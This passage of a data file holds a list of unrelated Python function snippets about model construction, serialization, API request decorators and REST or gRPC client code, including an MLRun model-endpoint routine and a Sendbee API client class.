t.Optional[AuthModel] = None,\n ) -> t.Any:\n if start:\n self.start()\n\n if model in self.API_CACHE:\n return self.API_CACHE[model]\n\n if not isinstance(auth, AuthModel):\n auth = self.AUTH\n\n self.API_CACHE[model] = model(auth=auth, log_level=self.API_LOG_LEVEL)\n return self.API_CACHE[model]", "def decorator(cls):\n\n instance = cls(*args, **kwargs)\n serializer_services.register_serializer(instance, **kwargs)\n\n return cls", "def convert_to_model(self, *args):", "def from_model(model):\n ret = model2json(model)\n return JsonBody(ret['body'])", "def api_method(func):\n @wraps(func)\n def decorator(self, return_request_args=False, *args, **kwargs):\n request_args = func(self, *args, **kwargs)\n request_args.update({\n 'method': '{module}.{method}'.format(\n module=self.__class__.__name__,\n method=func.__name__)})\n request_args = self._preprocess(request_args)\n if return_request_args:\n return request_args\n else:\n return self.pa.request(**request_args)\n return decorator", "def get_model(self, payload):\n return super(BulkEntryTransformer, self).to_model(payload)", "def get_model_instance(model,baseclass=None,nvarparams=1,**kwargs):\n if isinstance(model,ParametricModel if baseclass is None else baseclass):\n for k,v in kwargs.iteritems():\n setattr(model,k,v)\n return model\n else:\n cls = get_model_class(model,baseclass)\n args = (nvarparams,) if cls.isVarnumModel() else tuple()\n 
return cls(*args,**kwargs)", "def to_api_data(self):\n raise NotImplementedError()", "def api_documentation(api: str, summary: str, in_model: BaseModel,\n out_model: BaseModel, out_description: str) -> Callable:\n for model, name in ((in_model, 'Input'), (out_model, 'Output')):\n doc.Object(\n make_dataclass(\n f'Api{api[1:].title()}{name}',\n [(key, val.type_, val.type_)\n for key, val in model.__dict__['__fields__'].items()]))\n im_returns = doc.JsonBody({\n key: val.type_\n for key, val in in_model.__dict__['__fields__'].items()\n })\n\n om_returns = {\n key: val.type_\n for key, val in out_model.__dict__['__fields__'].items()\n }\n\n def decorator(func):\n @doc.summary(summary)\n @doc.response(412,\n 'Error: Precondition Failed',\n description='The passed request-parameters are invalid')\n @doc.response(500,\n 'Error: Server-Error occured',\n description='An internal error occured')\n @doc.consumes(im_returns,\n content_type='application/json',\n location='body')\n @doc.produces(om_returns,\n content_type='application/json',\n description=out_description)\n @wraps(func)\n async def function_wrapper(request, *args, **kwargs):\n return await func(request=request, *args, **kwargs)\n\n return function_wrapper\n\n return decorator", "def __init__(self, model: Type[ModelType]):\n self.model = model", "def __init__(self, model: Type[ModelType]):\n self.model = model", "def update(self, datastore, model, **kwargs):\n for k, v in self._preprocess_params(kwargs).items():\n setattr(model, k, v)\n self.save(datastore, model)\n return model", "def api_field_from_django_field(cls, f, default=CharField):\n if isinstance(f, JSONField):\n return JSONApiField\n \n return super(PandaModelResource, cls).api_field_from_django_field(f, default)", "def to_model(self, payload):\n if self.skip:\n raise SkipField\n\n model = self.get_or_initialize_model(payload)\n model = self.update_model_fields(model, payload)\n return model", "def json_to_model(cls, data):\n m = cls.to_model(data)\n m.raw = data\n cls._unlock_unmarshalling(m)\n cls.set_additional_fields(m, data)\n return m", "def model(self) -> Type[Model]:", "def _create_response_model(self, data):\n pass", "def update(self, model, **kwargs):\n self._isinstance(model)\n for k, v in self._preprocess_params(kwargs).items():\n setattr(model, k, v)\n self.save(model)\n return model", "def __init__(self, endpoint_name, sagemaker_session=None,\n serializer=json_serializer,\n deserializer=json_deserializer,\n content_type=None,\n model_name=None,\n model_version=None):\n super(Predictor, self).__init__(endpoint_name, sagemaker_session, serializer,\n deserializer, content_type)\n\n attributes = []\n if model_name:\n attributes.append('tfs-model-name={}'.format(model_name))\n if model_version:\n attributes.append('tfs-model-version={}'.format(model_version))\n self._model_attributes = ','.join(attributes) if attributes else None", "def proxy(self, modelcls):\n return ModelProxy(self, modelcls)", "def build_model(self, **kwargs):\n raise NotImplementedError()", "def __init__(self, model: object):\n self.model = model", "def fromRequest(cls, req):\n raise NotImplementedError(\n 'fromRequest is not implemented on %r' % (cls.__name__,))", "def __call__(self):\n return self.cls(**self.kwargs)", "def _update_param_dict_decorator(self, component_model, func_name):\n\n def decorated_func(*args, **kwargs):\n\n # Update the param_dict as necessary\n for key in self.param_dict.keys():\n if key in component_model.param_dict:\n component_model.param_dict[key] = 
self.param_dict[key]\n\n func = getattr(component_model, func_name)\n return func(*args, **kwargs)\n\n return decorated_func", "def _convert_into_model_endpoint_object(\n endpoint: typing.Dict[str, typing.Any], feature_analysis: bool = False\n ) -> mlrun.common.schemas.ModelEndpoint:\n\n # Convert into `ModelEndpoint` object\n endpoint_obj = mlrun.common.schemas.ModelEndpoint().from_flat_dict(endpoint)\n\n # If feature analysis was applied, add feature stats and current stats to the model endpoint result\n if feature_analysis and endpoint_obj.spec.feature_names:\n endpoint_features = (\n mlrun.api.crud.model_monitoring.deployment.get_endpoint_features(\n feature_names=endpoint_obj.spec.feature_names,\n feature_stats=endpoint_obj.status.feature_stats,\n current_stats=endpoint_obj.status.current_stats,\n )\n )\n if endpoint_features:\n endpoint_obj.status.features = endpoint_features\n # Add the latest drift measures results (calculated by the model monitoring batch)\n drift_measures = mlrun.api.crud.model_monitoring.helpers.json_loads_if_not_none(\n endpoint.get(\n mlrun.common.schemas.model_monitoring.EventFieldType.DRIFT_MEASURES\n )\n )\n endpoint_obj.status.drift_measures = drift_measures\n\n return endpoint_obj", "def model_wrapper(cls):\n return _create_wrapper_cls(cls, reset_mutation_uid=True, stop_parsing=False)", "def make_instance(self, data, **kwargs):\n instance = self.instance or self.get_instance(data)\n if instance is not None:\n for key, value in iteritems(data):\n setattr(instance, key, value)\n return instance\n kwargs, association_attrs = self._split_model_kwargs_association(data)\n instance = self.opts.model(**kwargs)\n for attr, value in iteritems(association_attrs):\n setattr(instance, attr, value)\n return instance", "def _get_latest_model(cls, model, spec):\n if hasattr(model, \"KEY\") and model.KEY is not None:\n spec[\"content\"] = model\n model = cls\n elif hasattr(model, \"STRUCT\"):\n spec[\"content\"] = model.STRUCT\n else:\n # Is a dict\n spec[\"content\"] = model\n spec[\"object\"] = model\n return model", "def make_request(self: BaseApi,) -> typing.Dict[str, int]:\n\n def serialize_item(item):\n if isinstance(item, pydantic.BaseModel):\n return item.dict()\n return item\n\n body = None\n\n m = ApiRequest(\n method=\"GET\",\n path=\"/api/v3/store/inventory\".format(),\n content_type=None,\n body=body,\n headers=self._only_provided({}),\n query_params=self._only_provided({}),\n cookies=self._only_provided({}),\n )\n return self.make_request({\"200\": {\"application/json\": typing.Dict[str, int],},}, m)", "def __call__(self, X):\n return self.model(X)", "def to_model(self, payload):\n return payload", "def __init__(self, *, model_func, client=None, verbose=False, **kwargs):\n super().__init__(client=client, verbose=verbose, **kwargs)\n self._model_func = model_func", "def from_json(cls: Type[T], value: JsonResponse, **kwargs) -> 'BaseModel':\n attr_names = [a.lstrip('_') for a in fields_dict(cls)]\n if cls.temp_attrs:\n attr_names.extend(cls.temp_attrs)\n valid_json = {k: v for k, v in value.items() if k in attr_names and v is not None}\n return cls(**valid_json, **kwargs) # type: ignore", "def get_model(*args):\n return Model()", "def make(model: Type[Model], **kwargs: Any) -> Model:\n return modelfactory_factory(model)(**kwargs)", "def _from_openapi_data(cls, *args, **kwargs): # noqa: E501\n\n _check_type = kwargs.pop('_check_type', True)\n _spec_property_naming = kwargs.pop('_spec_property_naming', False)\n _path_to_item = kwargs.pop('_path_to_item', ())\n 
_configuration = kwargs.pop('_configuration', None)\n _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())\n\n self = super(OpenApiModel, cls).__new__(cls)\n\n if args:\n raise ApiTypeError(\n \"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.\" % (\n args,\n self.__class__.__name__,\n ),\n path_to_item=_path_to_item,\n valid_classes=(self.__class__,),\n )\n\n self._data_store = {}\n self._check_type = _check_type\n self._spec_property_naming = _spec_property_naming\n self._path_to_item = _path_to_item\n self._configuration = _configuration\n self._visited_composed_classes = _visited_composed_classes + (self.__class__,)\n\n for var_name, var_value in kwargs.items():\n if var_name not in self.attribute_map and \\\n self._configuration is not None and \\\n self._configuration.discard_unknown_keys and \\\n self.additional_properties_type is None:\n # discard variable.\n continue\n setattr(self, var_name, var_value)\n return self", "def _old_request_model(self, instance, success):\n coll = self.get_collection('_model')\n callback = partial(self._do_validate,\n instance=instance,\n success=success)\n try:\n instance['_model']\n except KeyError:\n raise tornado.web.HTTPError(400, 'Missing model key')\n coll.find_one({'_id': instance['_model']},\n callback=callback)", "def beta_create_ModelService_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None):\n request_serializers = {\n ('google.cloud.ml.v1.ModelService', 'CreateModel'): CreateModelRequest.SerializeToString,\n ('google.cloud.ml.v1.ModelService', 'CreateVersion'): CreateVersionRequest.SerializeToString,\n ('google.cloud.ml.v1.ModelService', 'DeleteModel'): DeleteModelRequest.SerializeToString,\n ('google.cloud.ml.v1.ModelService', 'DeleteVersion'): DeleteVersionRequest.SerializeToString,\n ('google.cloud.ml.v1.ModelService', 'GetModel'): GetModelRequest.SerializeToString,\n ('google.cloud.ml.v1.ModelService', 'GetVersion'): GetVersionRequest.SerializeToString,\n ('google.cloud.ml.v1.ModelService', 'ListModels'): ListModelsRequest.SerializeToString,\n ('google.cloud.ml.v1.ModelService', 'ListVersions'): ListVersionsRequest.SerializeToString,\n ('google.cloud.ml.v1.ModelService', 'SetDefaultVersion'): SetDefaultVersionRequest.SerializeToString,\n }\n response_deserializers = {\n ('google.cloud.ml.v1.ModelService', 'CreateModel'): Model.FromString,\n ('google.cloud.ml.v1.ModelService', 'CreateVersion'): google_dot_longrunning_dot_operations__pb2.Operation.FromString,\n ('google.cloud.ml.v1.ModelService', 'DeleteModel'): google_dot_longrunning_dot_operations__pb2.Operation.FromString,\n ('google.cloud.ml.v1.ModelService', 'DeleteVersion'): google_dot_longrunning_dot_operations__pb2.Operation.FromString,\n ('google.cloud.ml.v1.ModelService', 'GetModel'): Model.FromString,\n ('google.cloud.ml.v1.ModelService', 'GetVersion'): Version.FromString,\n ('google.cloud.ml.v1.ModelService', 'ListModels'): ListModelsResponse.FromString,\n ('google.cloud.ml.v1.ModelService', 'ListVersions'): ListVersionsResponse.FromString,\n ('google.cloud.ml.v1.ModelService', 'SetDefaultVersion'): Version.FromString,\n }\n cardinalities = {\n 'CreateModel': cardinality.Cardinality.UNARY_UNARY,\n 'CreateVersion': cardinality.Cardinality.UNARY_UNARY,\n 'DeleteModel': cardinality.Cardinality.UNARY_UNARY,\n 'DeleteVersion': cardinality.Cardinality.UNARY_UNARY,\n 'GetModel': cardinality.Cardinality.UNARY_UNARY,\n 'GetVersion': cardinality.Cardinality.UNARY_UNARY,\n 'ListModels': 
cardinality.Cardinality.UNARY_UNARY,\n 'ListVersions': cardinality.Cardinality.UNARY_UNARY,\n 'SetDefaultVersion': cardinality.Cardinality.UNARY_UNARY,\n }\n stub_options = beta_implementations.stub_options(host=host, metadata_transformer=metadata_transformer, request_serializers=request_serializers, response_deserializers=response_deserializers, thread_pool=pool, thread_pool_size=pool_size)\n return beta_implementations.dynamic_stub(channel, 'google.cloud.ml.v1.ModelService', cardinalities, options=stub_options)", "def update_model(model, data, encoders, epochs, batch_size):\n model.fit(\n dict(data.drop(\"total_return\", axis=1)),\n data.total_return,\n epochs=epochs,\n batch_size=batch_size,\n verbose=False,\n )\n\n factors = pd.DataFrame(model.get_layer(\"date_embedding\").get_weights()[0]).reindex(\n data.date.unique()\n )\n\n loadings = pd.DataFrame(\n model.get_layer(\"ticker_embedding\").get_weights()[0]\n ).reindex(data.ticker.unique())\n\n loadings.index = encoders[\"ticker\"].inverse_transform(loadings.index)\n\n # rotating loadings so the factors are uncorrelated and unit variance\n rotated_loadings = loadings.dot(np.linalg.cholesky(factors.cov()))\n rotated_loadings.index.name = \"ticker\"\n rotated_loadings.columns.name = \"factor\"\n return rotated_loadings", "def invoke_model_api(self, md_name, edge, token, request_id=None, **payload):\n headers = {'Authorization': 'Bearer {}'.format(token)}\n if request_id:\n headers[legion_headers.MODEL_REQUEST_ID] = request_id\n\n url = f'{edge}/model/{md_name}/api/model/invoke'\n\n print('Requesting {} with data = {} in POST mode'.format(url, payload))\n\n payload = {\n 'data': [list(payload.values())],\n 'columns': list(payload.keys()),\n }\n\n response = requests.post(\n url,\n json=payload,\n headers=headers\n )\n\n if not response.ok:\n raise Exception(f'Returned wrong status code: {response.status_code}, body: {response.text},'\n f' payload: {payload}')\n\n self._last_response_id = response.headers.get(legion_headers.MODEL_REQUEST_ID)\n self._last_response = response.json()\n return self._last_response", "def get_model(\n model: PipelineModel,\n use_auth_token: Union[Text, None] = None,\n) -> Model:\n\n if isinstance(model, Model):\n pass\n\n elif isinstance(model, Text):\n model = Model.from_pretrained(\n model, use_auth_token=use_auth_token, strict=False\n )\n\n elif isinstance(model, Mapping):\n model.setdefault(\"use_auth_token\", use_auth_token)\n model = Model.from_pretrained(**model)\n\n else:\n raise TypeError(\n f\"Unsupported type ({type(model)}) for loading model: \"\n f\"expected `str` or `dict`.\"\n )\n\n model.eval()\n return model", "def wrapper(resource, request, ** kwargs):\n # ckech if everything is ok, before proceding\n resource.method_check(request, allowed=expected_methods)\n resource.is_authenticated(request)\n resource.throttle_check(request)\n\n # call the decorated method\n result = func(resource, request, **kwargs)\n\n # if a single response is expected\n if single:\n if returns_extra_data:\n objt = result[0]\n else:\n objt = result\n bundle = resource.build_bundle(obj=objt, request=request)\n to_be_serialized = resource.full_dehydrate(bundle)\n if returns_extra_data:\n to_be_serialized.data.update(result[1])\n else: # if we are expecting an array of objects\n # we need to paginante\n paginator = resource._meta.paginator_class(\n request.GET,\n result,\n resource_uri=resource.get_resource_uri(),\n limit=resource._meta.limit,\n max_limit=resource._meta.max_limit,\n 
collection_name=resource._meta.collection_name)\n\n to_be_serialized = paginator.page()\n\n bundles = [resource.build_bundle(obj=obj, request=request)\n for obj in to_be_serialized['objects']]\n\n to_be_serialized['objects'] = [resource.full_dehydrate(bnd)\n for bnd in bundles]\n\n resource.log_throttled_access(request)\n return resource.create_response(request, to_be_serialized)", "def get_model(model=gin.REQUIRED):\n return model", "def instance_to_model(self):\n pass", "def __init__(self, model: str, **kwargs):\n super().__init__(model=model)", "def model() -> Model:\n return Model()", "def convert_to_model(self, *args):\n rt_xref_service_data, *_ = args\n return [RealtyTypeXRefService(**rt_xref_service) for rt_xref_service in rt_xref_service_data]", "def __call__(self, # pylint: disable=arguments-differ, useless-super-delegation\n features, labels, params=None, config=None):\n return super(BaseModel, self).__call__(features, labels, params, config)", "def get_response_model_ctor(self):\n return self._response_model_ctor", "def __init__(self, model):\n self._model = model", "def add_interface(cls, model, context, model_name, data={}, *args, **kwargs):\n\n # Wrap the fit method:\n def fit_wrapper(fit_method, **kwargs):\n def wrapper(*args, **kwargs):\n # Call the original fit method\n fit_method(*args, **kwargs)\n\n # Original fit method\n setattr(model, \"fit\", fit_method)\n\n # Post fit\n _post_fit(*args, **kwargs)\n\n return wrapper\n\n setattr(model, \"fit\", fit_wrapper(model.fit, **kwargs))\n\n def _post_fit(*args, **kwargs):\n eval_metrics = None\n context.set_label(\"class\", str(model.__class__.__name__))\n\n # Identify splits and build test set\n X_train = args[0]\n y_train = args[1]\n train_set = pd.concat([X_train, y_train], axis=1)\n train_set.reset_index(drop=True, inplace=True)\n\n if data.get(\"X_test\") is not None and data.get(\"y_test\") is not None:\n # Identify splits and build test set\n X_test = data[\"X_test\"]\n y_test = data[\"y_test\"]\n test_set = pd.concat([X_test, y_test], axis=1)\n test_set.reset_index(drop=True, inplace=True)\n\n # Evaluate model results and get the evaluation metrics\n eval_metrics = eval_model_v2(context, X_test, y_test, model)\n\n if data.get(\"generate_test_set\"):\n # Log test dataset\n context.log_dataset(\n \"test_set\",\n df=test_set,\n format=\"parquet\",\n index=False,\n labels={\"data-type\": \"held-out\"},\n artifact_path=context.artifact_subpath(\"data\"),\n )\n\n # Log fitted model and metrics\n label_column = (\n y_train.name\n if isinstance(y_train, pd.Series)\n else y_train.columns.to_list()\n )\n context.log_model(\n model_name or \"model\",\n db_key=model_name,\n body=dumps(model),\n artifact_path=context.artifact_subpath(\"models\"),\n framework=f\"{str(model.__module__).split('.')[0]}\",\n algorithm=str(model.__class__.__name__),\n model_file=f\"{str(model.__class__.__name__)}.pkl\",\n metrics=context.results,\n format=\"pkl\",\n training_set=train_set,\n label_column=label_column,\n extra_data=eval_metrics,\n )", "def model(self, model):\n \n self._model = model", "def GetModel(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def factory(bigquery_model):\n def _create_bigquery_http_request(*args, **kwargs):\n captured_model = bigquery_model\n return BigQueryHttp(captured_model, *args, **kwargs)\n\n return _create_bigquery_http_request", "def decorator(func):\n def wrapper(resource, request, ** kwargs):\n \"\"\" wraps the method with common api response's 
routines, like\n checking if it's authenticated or packing the response in an api\n friendly way\n\n \"\"\"\n # ckech if everything is ok, before proceding\n resource.method_check(request, allowed=expected_methods)\n resource.is_authenticated(request)\n resource.throttle_check(request)\n\n # call the decorated method\n result = func(resource, request, **kwargs)\n\n # if a single response is expected\n if single:\n if returns_extra_data:\n objt = result[0]\n else:\n objt = result\n bundle = resource.build_bundle(obj=objt, request=request)\n to_be_serialized = resource.full_dehydrate(bundle)\n if returns_extra_data:\n to_be_serialized.data.update(result[1])\n else: # if we are expecting an array of objects\n # we need to paginante\n paginator = resource._meta.paginator_class(\n request.GET,\n result,\n resource_uri=resource.get_resource_uri(),\n limit=resource._meta.limit,\n max_limit=resource._meta.max_limit,\n collection_name=resource._meta.collection_name)\n\n to_be_serialized = paginator.page()\n\n bundles = [resource.build_bundle(obj=obj, request=request)\n for obj in to_be_serialized['objects']]\n\n to_be_serialized['objects'] = [resource.full_dehydrate(bnd)\n for bnd in bundles]\n\n resource.log_throttled_access(request)\n return resource.create_response(request, to_be_serialized)\n return wrapper", "def as_api_parameters(self):\n raise NotImplementedError(\n 'as_api_parameters not implemented on ' + self.__class__)", "def update_model_kwargs(model_default):\n def model_update_decorator(func):\n\n @functools.wraps(func)\n def update_wrapper(*args, **kwargs):\n updated_kwargs = update_model_kwargs_logic(model_default, kwargs)\n if 'verbose' in updated_kwargs:\n if updated_kwargs['verbose'] > 0:\n # Print out the full updated kwargs\n print(\"INFO:kgcnn: Updated model kwargs:\")\n pprint.pprint(updated_kwargs)\n\n return func(*args, **updated_kwargs)\n\n return update_wrapper\n\n return model_update_decorator", "def create_model_endpoint(\n cls,\n db_session: sqlalchemy.orm.Session,\n model_endpoint: mlrun.common.schemas.ModelEndpoint,\n ) -> mlrun.common.schemas.ModelEndpoint:\n\n if model_endpoint.spec.model_uri or model_endpoint.status.feature_stats:\n logger.info(\n \"Getting feature metadata\",\n project=model_endpoint.metadata.project,\n model=model_endpoint.spec.model,\n function=model_endpoint.spec.function_uri,\n model_uri=model_endpoint.spec.model_uri,\n )\n\n # If model artifact was supplied, grab model metadata from artifact\n if model_endpoint.spec.model_uri:\n logger.info(\n \"Getting model object, inferring column names and collecting feature stats\"\n )\n run_db = mlrun.api.api.utils.get_run_db_instance(db_session)\n model_obj: mlrun.artifacts.ModelArtifact = (\n mlrun.datastore.store_resources.get_store_resource(\n model_endpoint.spec.model_uri, db=run_db\n )\n )\n\n # Get stats from model object if not found in model endpoint object\n if not model_endpoint.status.feature_stats and hasattr(\n model_obj, \"feature_stats\"\n ):\n if model_obj.spec.feature_stats:\n mlrun.common.model_monitoring.helpers.pad_features_hist(\n mlrun.common.model_monitoring.helpers.FeatureStats(\n model_obj.spec.feature_stats\n )\n )\n model_endpoint.status.feature_stats = model_obj.spec.feature_stats\n # Get labels from model object if not found in model endpoint object\n if not model_endpoint.spec.label_names and model_obj.spec.outputs:\n model_label_names = [\n mlrun.api.crud.model_monitoring.helpers.clean_feature_name(f.name)\n for f in model_obj.spec.outputs\n ]\n 
model_endpoint.spec.label_names = model_label_names\n\n # Get algorithm from model object if not found in model endpoint object\n if not model_endpoint.spec.algorithm and model_obj.spec.algorithm:\n model_endpoint.spec.algorithm = model_obj.spec.algorithm\n\n # Create monitoring feature set if monitoring found in model endpoint object\n if (\n model_endpoint.spec.monitoring_mode\n == mlrun.common.schemas.model_monitoring.ModelMonitoringMode.enabled.value\n ):\n monitoring_feature_set = cls.create_monitoring_feature_set(\n model_endpoint, model_obj, db_session, run_db\n )\n # Link model endpoint object to feature set URI\n model_endpoint.status.monitoring_feature_set_uri = (\n monitoring_feature_set.uri\n )\n\n # If feature_stats was either populated by model_uri or by manual input, make sure to keep the names\n # of the features. If feature_names was supplied, replace the names set in feature_stats, otherwise - make\n # sure to keep a clean version of the names\n if model_endpoint.status.feature_stats:\n logger.info(\"Feature stats found, cleaning feature names\")\n if model_endpoint.spec.feature_names:\n # Validate that the length of feature_stats is equal to the length of feature_names and label_names\n cls._validate_length_features_and_labels(model_endpoint=model_endpoint)\n\n # Clean feature names in both feature_stats and feature_names\n (\n model_endpoint.status.feature_stats,\n model_endpoint.spec.feature_names,\n ) = cls._adjust_feature_names_and_stats(model_endpoint=model_endpoint)\n\n logger.info(\n \"Done preparing feature names and stats\",\n feature_names=model_endpoint.spec.feature_names,\n )\n\n # If none of the above was supplied, feature names will be assigned on first contact with the model monitoring\n # system\n logger.info(\"Creating model endpoint\", endpoint_id=model_endpoint.metadata.uid)\n\n # Write the new model endpoint\n model_endpoint_store = get_model_endpoint_store(\n project=model_endpoint.metadata.project,\n secret_provider=mlrun.api.crud.secrets.get_project_secret_provider(\n project=model_endpoint.metadata.project\n ),\n )\n model_endpoint_store.write_model_endpoint(endpoint=model_endpoint.flat_dict())\n\n logger.info(\"Model endpoint created\", endpoint_id=model_endpoint.metadata.uid)\n\n return model_endpoint", "def create(self, validated_data):\n ModelClass = self.Meta.model\n instance = ModelClass()\n self.instance = instance\n for key, value in validated_data.items():\n setattr(instance, key, value)\n return super().create(validated_data)", "def get_request_kwargs(self, api_params, *args, **kwargs):\n serialized = self.serialize_data(kwargs.get(\"data\"))\n kwargs[\"data\"] = self.format_data_to_request(serialized)\n return kwargs", "def convert_to_model(self, *args):\n city_xref_service_data, *_ = args\n return [CityXRefService(**city_xref_service) for city_xref_service in city_xref_service_data]", "def create(self, validated_data):\n return API.objects.create(**validated_data)", "def opt_engine_rest_api():\n request_json = request.get_json()\n return process_request(request_json)", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(AlignModelSrvRequest, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.model is None:\n self.model = articulation_msgs.msg.ModelMsg()\n if self.data is None:\n self.data = articulation_msgs.msg.ModelMsg()\n else:\n self.model = articulation_msgs.msg.ModelMsg()\n self.data = articulation_msgs.msg.ModelMsg()", "def 
convert_to_single_model(realty_data):\n return Realty(**realty_data)", "def _delegate(self, name, *args, **kwargs):\n func = getattr(self.model_obj, name)\n res = func(*args, **kwargs)\n return res", "def __init__(self, model: Optional[Model] = None) -> None:\n self.model = model", "def hydrate_from_staff_api(sender, instance, **kwargs):\n if instance.pk:\n return\n\n instance.sync_with_staff_api()", "def __get__(self, model_instance, model_class):\n if model_instance is None:\n return self\n return self.calc_fn(model_instance)", "def _predict_preproc_model(self, model_cfg, model,):\n model = self._make_model(model_cfg['model_name'], databunch=self._data)\n model.model_param = model_cfg['model_param']\n model.wrapper_params = model_cfg['wrapper_params']\n return(model)", "def get_model(self, key: str = None, **kwargs) -> Dict:\n raise NotImplementedError", "def __call__(self, method, url, *args, **kwargs):\n log.debug('{} {}'.format(method.upper(), url))\n if 'params' in kwargs:\n kwargs['query'] = kwargs.pop('params')\n return getattr(self.client, method)(url, *args, **kwargs).json", "def GetModel(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def convert_api_to_usr_model(self):\n\n usr_model = dict()\n self._copy_api_entry('ApplicationName', usr_model)\n self._copy_api_entry('DateUpdated', usr_model)\n if 'ResourceLifecycleConfig' in self.api_model:\n usr_model['Configurations'] = self.api_model['ResourceLifecycleConfig']\n else:\n usr_model['Configurations'] = DEFAULT_LIFECYCLE_CONFIG\n\n if 'ServiceRole' not in usr_model['Configurations']:\n try:\n role = get_role(DEFAULT_LIFECYCLE_SERVICE_ROLE)\n if u'Arn' in role:\n arn = role[u'Arn']\n else:\n arn = DEFAULT_ARN_STRING\n except (NotFoundError, ServiceError):\n arn = DEFAULT_ARN_STRING\n\n usr_model['Configurations']['ServiceRole'] = arn\n\n return usr_model", "def __init__(self, model):\n self.model = model", "def __init__(self, model):\n self.model = model", "def __init__(self, model):\n self.model = model", "def __init__(self, model):\n self.model = model", "def from_python_function(instance):\n # set the pagination class\n pagination_class = FromPythonPagination\n # filter queryset based on the search terms\n instance.queryset = instance.filter_queryset(instance.queryset)\n # get the serializer for this view\n current_serializer = general_serializer(instance)\n # serialize the data (many flag for serializing a queryset)\n serialized_queryset = current_serializer(instance.queryset, many=True, context={'request': instance.request})\n # get the data to serialize\n data = serialized_queryset.data\n # generate the response\n return HttpResponse(JSONRenderer().render({'count': len(instance.queryset), 'next': None, 'previous': None,\n 'results': data}))", "def bind_request(**request_data):\n\n class Request(Api):\n \"\"\"Request class. 
Does the actual API request.\"\"\"\n\n model = request_data.get(constants.ClientConst.MODEL)\n api_path = request_data.get(constants.RequestConst.API_PATH)\n formatter = request_data.get(constants.ClientConst.FORMATTER)\n method = request_data.get(\n constants.RequestConst.METHOD, constants.RequestConst.GET\n )\n query_parameters = request_data.get(\n constants.RequestConst.QUERY_PARAMETERS\n )\n fake_response_path = request_data.get(\n constants.TestConst.FAKE_RESPONSE_PATH\n )\n default_parameters = request_data.get(\n constants.RequestConst.DEFAULT_PARAMETERS, {}\n )\n # immediately determine type of response\n single_model_response = request_data.get(\n constants.ClientConst.FORCE_SINGLE_MODEL_RESPONSE, False\n ) or method in [\n constants.RequestConst.POST,\n constants.RequestConst.PUT,\n constants.RequestConst.DELETE\n ]\n\n def __init__(self, client, debug: 'Debug',\n *path_params, **query_params):\n client.request = self\n\n self.url = None\n self.debug = debug\n self.client = client\n self.parameters = {\n constants.RequestConst.QUERY: {},\n constants.RequestConst.PATH: []\n }\n\n self._timeout = 5\n\n self._set_parameters(*path_params, **query_params)\n\n def _set_parameters(self, *path_params, **query_params):\n \"\"\"\n Prepares the list of query parameters\n :path_params: list of path parameters\n :query_params: dict of query parameters\n :return: None\n \"\"\"\n\n # take timeout\n try:\n self._timeout = int(query_params.get(\n constants.RequestConst.TIMEOUT, self._timeout\n ))\n except ValueError:\n pass\n try:\n del query_params[constants.RequestConst.TIMEOUT]\n except KeyError:\n pass\n\n # set default API call params\n for key, value in self.default_parameters.items():\n self.parameters[constants.RequestConst.QUERY][key] = value\n\n _query_params = self.query_parameters.get_params()\n\n # set API call params defined during the \"call\" invocation\n for key, value in query_params.items():\n if value is None:\n continue\n\n if key in _query_params.values():\n self.parameters[constants.RequestConst.QUERY][key] = value\n\n elif key in _query_params.keys():\n self.parameters[\n constants.RequestConst.QUERY\n ][_query_params[key]] = value\n\n if self.method == constants.RequestConst.GET:\n # transform all True and False param to 1 and 0\n for key, value in self.parameters[\n constants.RequestConst.QUERY\n ].items():\n if value is True:\n self.parameters[constants.RequestConst.QUERY][key] = \\\n constants.BoolConst.TRUE\n if value is False:\n self.parameters[constants.RequestConst.QUERY][key] = \\\n constants.BoolConst.FALSE\n\n # set optional url path params\n for value in path_params:\n self.parameters[constants.RequestConst.PATH].append(value)\n\n def _prepare_url(self):\n \"\"\"\n Prepares url and query parameters for the request\n :return: URL\n \"\"\"\n\n base_url = '{}://{}{}'.format(\n self.client.protocol, self.client.base_url, self.api_path\n )\n url_parts = '/'.join(\n [part for part in self.parameters[constants.RequestConst.PATH]]\n )\n\n if url_parts:\n final_url = '{}/{}'.format(base_url, url_parts)\n else:\n final_url = base_url\n\n if self.method == constants.RequestConst.GET:\n params = self.parameters[constants.RequestConst.QUERY]\n for param, value in params.items():\n if isinstance(value, list):\n params[param] = ','.join(value)\n elif isinstance(value, dict):\n params[param] = ','.join([f'{k}:{v}' for k, v in value])\n\n url_query = '?' 
+ '&'.join([f'{k}={v}' for k, v in params.items()])\n final_url = '{}{}'.format(final_url, url_query)\n\n self.debug.ok('final url', final_url)\n\n return final_url\n\n def _headers(self):\n \"\"\"Construct headers data with authentication part\"\"\"\n\n auth_token = SendbeeAuth(self.client.api_secret).get_auth_token()\n headers = {\n 'X-Auth-Token': auth_token,\n 'X-Api-Key': self.client.api_key,\n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n 'User-Agent': 'Sendbee Python API Client'\n }\n self.debug.ok('headers', headers)\n\n return headers\n\n def _do_request(self, url: str):\n \"\"\"\n Makes the request to Sendbee Api servers\n :url: Url for the request\n :return: Tuple with two elements, status code and content\n \"\"\"\n\n self.debug.ok('method', self.method)\n\n if self.client.fake_response_path:\n with open(self.client.fake_response_path, 'r') as f:\n return constants.ResponseCode.OK, f.read()\n\n elif self.method == constants.RequestConst.GET:\n response = requests.get(\n url, headers=self._headers(), timeout=self._timeout\n )\n\n self.debug.ok(\n constants.RequestConst.QUERY_PARAMETERS,\n self.parameters[constants.RequestConst.QUERY]\n )\n self.debug.ok(constants.ResponseConst.RESPONSE_OBJECT, response)\n\n return response.status_code, response.text\n\n elif self.method in [\n constants.RequestConst.POST,\n constants.RequestConst.PUT,\n constants.RequestConst.DELETE\n ]:\n if self.method == constants.RequestConst.POST:\n send_request = requests.post\n elif self.method == constants.RequestConst.PUT:\n send_request = requests.put\n elif self.method == constants.RequestConst.DELETE:\n send_request = requests.delete\n\n response = send_request(\n url, json=self.parameters[constants.RequestConst.QUERY],\n headers=self._headers(), timeout=self._timeout\n )\n\n self.debug.ok('payload', self.parameters[\n constants.RequestConst.QUERY\n ])\n 